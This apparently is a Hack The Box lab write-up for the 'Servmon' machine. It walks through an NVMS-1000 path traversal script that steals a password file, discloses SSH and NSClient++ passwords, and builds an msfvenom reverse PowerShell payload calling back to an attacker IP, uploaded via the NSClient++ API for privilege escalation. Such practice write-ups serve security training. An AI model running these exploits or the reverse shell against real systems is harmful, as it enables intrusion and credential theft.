[hackthebox]Servmon

Introduction

Servmon is a new machine that receives very low ratings because a lot of people complain that the NSClient++ web portal is "unstable". This can be worked around by using the Chromium browser; if you are using Kali Linux as root, run chromium --no-sandbox. You cannot log in to this portal remotely because it is restricted to localhost, but this can be worked around with an SSH tunnel.

nmap scan

nmap -sC -sV -oN servmon -vvv 10.10.10.184
In summary, these are the open ports:

PORT     STATE SERVICE       REASON          VERSION
21/tcp   open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM                 Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp   open  ssh           syn-ack ttl 127 OpenSSH for_Windows_7.7 (protocol 2.0)

80/tcp   open  http          syn-ack ttl 127

135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack ttl 127
5666/tcp open  tcpwrapped    syn-ack ttl 127
6699/tcp open  napster?      syn-ack ttl 127
8443/tcp open  ssl/https-alt syn-ack ttl 127

Host script results:
|_clock-skew: 2m30s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 40676/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 20065/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 54993/udp): CLEAN (Failed to receive data)
|   Check 4 (port 62863/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-04-15T04:42:56
|_  start_date: N/A

I tested ports 139 and 445 and did web fuzzing on http://10.10.10.184. I could not find an entry point through an SMB vulnerability, and web fuzzing did not enumerate any useful directory either:

-----------------
DIRB v2.22
By The Dark Raver
-----------------

OUTPUT_FILE: dirb_result
START_TIME: Thu Apr 16 11:10:01 2020
URL_BASE: http://10.10.10.184/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.184/ ----
+ http://10.10.10.184/favicon.ico (CODE:200|SIZE:1150)
+ http://10.10.10.184/index.htm (CODE:200|SIZE:340)

-----------------
END_TIME: Thu Apr 16 11:38:15 2020
DOWNLOADED: 4612 - FOUND: 2

NVMS-1000 web portal

[screenshot: servmon4]
Searching the web with DuckDuckGo, I found that there is a path traversal vulnerability.

On searchsploit this exploit can be found:
[screenshot: servmon5]

Reading the exploit document, you will see a PoC:
POC:

curl http://%5BIP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings

I tested this with msfconsole and files can be downloaded.
[screenshot: servmon6]
[screenshot: servmon7]

The NSClient++ configuration file can be downloaded from the path /program+files/nsclient%2B%2B/nsclient.ini. You need to understand that the file path is part of a URI, hence the "/" and the space have to be URL-encoded.
[screenshot: servmon8]

[screenshot: servmon9]

In nsclient.ini a plaintext password for NSClient++ is found. This is used when rooting the machine, but first of all we need to find the user flag.

User’s flag hint

FTP to 10.10.10.184; this FTP server allows anonymous login.
[screenshot: servmon10]
Then enumerate the directories once the connection is established.
[screenshot: servmon11]
Download the files in the respective directories to find out what they are.
[screenshot: servmon12]

Looking at Confidential.txt, I found out where to look for passwords.
[screenshot: servmon13]

Reading Notes to do.txt, I understood that NSClient++ cannot be accessed remotely; this matches nsclient.ini, which only allows 127.0.0.1.
[screenshot: servmon14]

Looking at nsclient.ini
[screenshot: servmon15]

Download password.txt

I will be using the same NVMS-1000 path traversal exploit to download the password.txt file.
I could use the same exploit in msfconsole to do it, but I decided to write my own Python script to download the file.

import requests

# You will need to URL-encode the ../ for the web server to understand it 😉
# I fuzzed the traversal depth until it spat out the nsclient.ini hahaha
traversal = "..%2F"
web = "http"
port = 80
outfile = "passwords.txt"
# on msfconsole use the auxiliary/scanner/http/tvt_nvms_traversal
# set filepath to /Users/Nathan/Desktop/Passwords.txt
filepath = "Users%2FNathan%2FDesktop%2FPasswords.txt"
# three encoded ../ segments in front of the encoded target path
uri = f"{web}://10.10.10.184:{port}/{traversal * 3}{filepath}"
print(uri)
response = requests.get(uri, verify=False)
if response.status_code == 200:
    # save the retrieved file locally
    with open(f"/root/htb/servmon/{outfile}", "w") as file:
        file.write(response.text)

There are several passwords. I tested each of them for both nathan and nadine over SSH, and finally I got connected as nadine with this password: L1k3B1gBut7s@W0rk

Get user’s flag

ssh nadine@10.10.10.184 with the password found.
[screenshot: servmon17]

Privilege escalation

As only 127.0.0.1 is allowed to access the NSClient++ web portal, I need an SSH tunnel to bypass this restriction. Also, the web portal may not display properly in Firefox; I recommend using Chromium, which works much better.

ssh -L 8080:127.0.0.1:8443 nadine@10.10.10.184
This is the command line to set up the SSH tunnel. It means you are setting up a listener on your attacking machine at 127.0.0.1:8080; the traffic sent there is forwarded over SSH to 10.10.10.184, which in turn delivers it to its own localhost on port 8443.

This is how I use chromium --no-sandbox to open the NSClient++ web UI and log in with the password discovered in nsclient.ini.
[screenshot: servmon18]
This is the NSClient++ password discovered: ew2x6SsGTxjRwXOT
There is a vulnerability in NSClient++, which you can find with searchsploit nsclient

[screenshot: servmon19]
You can read the instructions: the prerequisites are that CheckExternalScripts and Scheduler are enabled, and you can check in the web UI that these two modules are enabled.
[screenshot: servmon20]
[screenshot: servmon22]

I tried to add my own scripts in the web UI but had problems configuring them, so I turned to the NSClient++ API and used the add-script API.
I tried to upload nc.exe but it was deleted; I suspect it was quarantined by Windows Defender. I also tried to upload a reverse shell PowerShell script and it was deleted too. But there is a solution: I used msfvenom to create a batch file that triggers a PowerShell script from within the batch file.
msfvenom -p cmd/windows/reverse_powershell lhost=10.10.14.20 lport=4444 -o evilps.bat

[screenshot: servmon23]

Use this curl command to upload the batch file from my attacking machine to Servmon.
curl -s -k -u admin -X PUT https://localhost:8080/api/v1/scripts/ext/scripts/evilps.bat --data-binary @evilps.bat
Notice the address is https://localhost:8080, which goes through the SSH tunnel.
[screenshot: servmon24]

Set up the multi/handler in msfconsole with the same payload I used for msfvenom.
[screenshot: servmon25]

Then run the command in the NSClient++ web UI console.
[screenshot: servmon26]

[screenshot: servmon27]
